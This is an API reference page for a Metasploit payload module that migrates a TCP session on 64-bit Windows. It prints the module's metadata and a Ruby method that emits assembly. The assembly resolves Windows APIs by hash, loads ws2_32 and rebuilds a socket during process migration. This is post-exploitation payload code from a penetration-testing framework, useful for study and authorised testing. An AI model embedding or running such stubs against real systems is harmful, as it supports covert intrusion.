Module: Msf::Payload::Windows::MigrateTcp_x64

Includes:
MigrateCommon_x64
Defined in:
lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb

Overview

Payload that supports migration over the TCP transport on x64.

Constant Summary collapse

WSA_SIZE =

Minimum size, plus bytes for alignment

0x1A0

Instance Method Summary collapse

Methods included from MigrateCommon_x64

#generate

Methods included from BlockApi_x64

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate_migrate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly



32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
 
# File 'lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb', line 32

def generate_migrate(opts={})
  %Q^
  load_ws2_32:
    mov r14, 'ws2_32'
    push r14
    mov rcx, rsp              ; pointer to 'ws2_32'
    sub rsp, #{WSA_SIZE}      ; alloc size, plus alignment (used later)
    mov r13, rsp              ; save pointer to this struct
    sub rsp, 0x28             ; space for api function calls (really?)
    mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
    call rbp                  ; LoadLibraryA('ws2_32')
  init_networking:
    mov rdx, r13              ; pointer to the wsadata struct
    push 2
    pop rcx                   ; Version = 2
    mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
    call rbp                  ; WSAStartup(Version, &WSAData)
  create_socket:
    xor r8, r8                ; protocol not specified
    push r8                   ; flags == 0
    push r8                   ; reserved == NULL
    lea r9, [rsi+0x10]        ; Pointer to the info in the migration context
    push 1
    pop rdx                   ; SOCK_STREAM
    push 2
    pop rcx                   ; AF_INET
    mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
    call rbp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
    xchg rdi, rax
  ^
end

#initialize(info = {}) ⇒ Object 



18
19
20
21
22
23
24
25
26
27
 
# File 'lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb', line 18

def initialize(info={})
  super(update_info(info,
    'Name'        => 'TCP Transport Migration (x64)',
    'Description' => 'Migration stub to use over the TCP transport via x64',
    'Author'      => ['OJ Reeves'],
    'License'     => MSF_LICENSE,
    'Platform'    => 'win',
    'Arch'        => ARCH_X64
  ))
end